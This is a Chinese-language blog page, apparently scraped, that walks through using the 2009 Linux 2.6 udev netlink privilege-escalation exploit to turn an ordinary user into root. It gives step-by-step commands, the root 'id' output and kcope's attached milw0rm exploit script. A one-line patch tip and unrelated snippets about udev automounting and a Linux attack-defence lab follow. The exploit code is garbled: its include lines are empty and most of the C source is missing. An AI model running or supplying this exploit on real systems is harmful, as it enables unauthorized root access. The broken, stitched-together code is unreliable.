此漏洞針對linux2.6核心,只要有普通使用者許可權,即可提公升root許可權,開始實驗吧
1、複製以下**,儲存為udev.sh,並賦予可執行許可權
2、#useradd test //新建乙個普通使用者
3、#su - test //切換至test使用者
4、#ps -ef |grep udev //檢視udev id
root 474 1 0 apr09 ? 00:00:00 /sbin/udevd -d
5、#sh udev.sh 473 //執行命令,udevd的id號減1,即473
6、sh-3.2# id
uid=0(root) gid=0(root) groups=506(test)
此時test已經提公升至root許可權
如何修復漏洞,只要公升級udev就行了
#yum update udev
附**:
#!/bin/sh
# linux 2.6
# bug found by sebastian krahmer
# lame sploit using ld technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be unix formatted text :)
# + if it doesn't work the 1st time try more often
# warning: maybe needs some fixup to work flawlessly
## greetz fly out to alex,andi,adize,wy!,revo,j! and the gang
cat > udev.c << _eof
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifndef netlink_kobject_uevent
#define netlink_kobject_uevent 15
#endif
#define short_string 64
#define medium_string 128
#define big_string 256
#define long_string 1024
#define extralong_string 4096
#define true 1
#define false 0
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
main(int argc, char **argv)
_eof
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
# milw0rm.com [2009-04-20]
/tmp/suid
linux 自動掛載U盤之udev
cd etc udev rules.d 建立乙個檔案 10 jixiuf usb.rules 內容如下 kernel sd b z 0 9 goto media by label auto mount end import fs infos import sbin blkid o udev p n ...
linux攻防比賽 Linux系統攻防對抗實踐
一 實踐目的 通過linux系統攻防對抗實踐,加深對linux系統的認識,同時掌握linux漏洞入侵和架設防禦的初步方法。二 實踐內容 在metasploit滲透攻擊框架軟體中尋找乙個針對linux系統服務的滲透攻擊模組,在網路安全攻防實驗環境中部署有漏洞的環境 如滲透利用第三方網路服務,需要找到並...
Ubuntu之udev用法總結
u即user space,dev是device,通過它的名字,我們就可以簡單了解到,它是乙個和使用者態相關的驅動裝置管理機制。udev是乙個針對2.6核心的檔案系統。提供一種基於使用者空間的動態裝置節點管理和命名的解決方案。用於取代落後的devfs udev與硬體平台無關,屬於使用者空間的程序,是乙...